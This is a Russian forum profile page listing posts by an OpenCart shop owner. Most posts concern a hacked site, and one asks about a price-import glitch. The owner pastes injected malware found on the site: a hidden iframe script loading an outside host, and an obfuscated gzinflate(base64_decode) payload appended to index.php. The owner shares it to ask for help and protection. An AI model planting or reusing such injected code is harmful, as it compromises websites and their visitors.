Перейти к содержанию

newPlayer

Новичок
  • Публикаций

    10
  • Зарегистрирован

  • Посещение

Репутация

1 Обычный

Информация о newPlayer

  • Звание
    Пользователь
  1. Доброго, У меня обнаружился странный глюк. Меняю в экзелевском файле цену. После импорта в настройках товара сбивается родительская категории (в связях) из-за чего при переходе на страницу категории отображается старая цена :( При этом на странице товара (или на странице дочерней категории) и в админке цена новая. Когда в админке сохранишь товар, выбрав родительскую категорию, на сайте на странице родительской категории цена меняется. Где собака зарыта?
  2. Доброго, У меня обнаружился странный глюк. Меняю в экзелевском файле цену. После импорта в настройках товара сбивается родительская категории (в связях) из-за чего при переходе на страницу категории отображается старая цена :( При этом на странице товара (или на странице дочерней категории) и в админке цена новая. Когда в админке сохранишь товар, выбрав родительскую категорию, на сайте на странице родительской категории цена меняется. Где собака зарыта?
  3. Думаю так и сделать. А что такое шелл?
  4. RGB И как с этой гадостью бороться? Удаления файлов модуля хватит? Мне бы вообще понять, как механизм по добавлению кода в index.php работает.
  5. Спасибо за совет. Сменил ключ шифрования - не помогло (атака через 2 дня повторилась). Сейчас поменял пароль к фтп, залил .htaccess в папку "download". Скажите, а каким вообще образом добавляется код в файл index.php? Из модулей (помимо поиска на яксе) я еще ставил новости (скачивал вроде с =^_^=) - каким образом взламывают через модули? И может ли это быть действием вируса?
  6. Доброго, Столкнулся со следующей проблемой. Примерно, через две недели после размещения сайта на реальном хостинге, заметил, что на странице сместился div с footer`ом. Пробежался по коду страницы и в самом конце нашел левый скрипт: <script> var _q = document.createElement('iframe'), _n = 'setAttribute'; _q[_n]('src', 'http://twitter.dnsjiexi.tk:1342/t/a219bf65b03b586005c6a8e76660286a'); _q.style.position = 'absolute'; _q.style.width = '10px'; _q[_n]('frameborder', navigator.userAgent.indexOf('2491bc9c7d8731e1ae33124093bc7026') + 1); _q.style.left = '-6247px'; document.write('<div id=\'Twitter\'></div>'); document.getElementById('Twitter').appendChild(_q); </script> В корневом index.php нашел новый код – тоже в самом конце страницы: #c3284d# echo(gzinflate(base64_decode("VVFNU4NADL13pv9hb0vHCizQBSrtTHU8ePLizTrMfoR2lQJd0g//vUBrR3NL8pL38pK1ypoGl+PRUViS78mC6FoddlChqywIhOcS+syhprBiB3QyHY9IF3nVYWkLu EK0Rh4Q6MN4lO/f8+rDoa1VdEroFrGZex6eDCJYV1ftp4GzcfFrzsIo8NATAUtlwWfSD+Us4b4/U1wkEHPO/SDhgk6GrW6L3yW4Td0aNPVALWRblzfaK+BkNG77LvOb819Bg3hZWw22E1aJo9kIrK17aMGu Nv25ptJwfi0cGkQpkypVsU7ikAETEIYsiPw0lCr2A04n5I6wf7pKKLBnvedBFF+IbzaerEFwaKbNkRi9WNO3ixtrusy8rrgcTrzBN4BXyx+/X7Tzi6YTVzQNVPppa0rt5Pt+KPOu7/sB"))); #/c3284d# ?> Удалил – стало все ок. Вопрос: каким образом добавился код в index.php (я читал про sql-инъекции, но не особо в этом разбераюсь), а главное – как защититься от этого. Буду признателен любой помощи. Сайт на opencart 1.5.3.1. В качестве шаблона используются hyla (правда, я там много чего переделал). Также используется simple ajax search.
×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.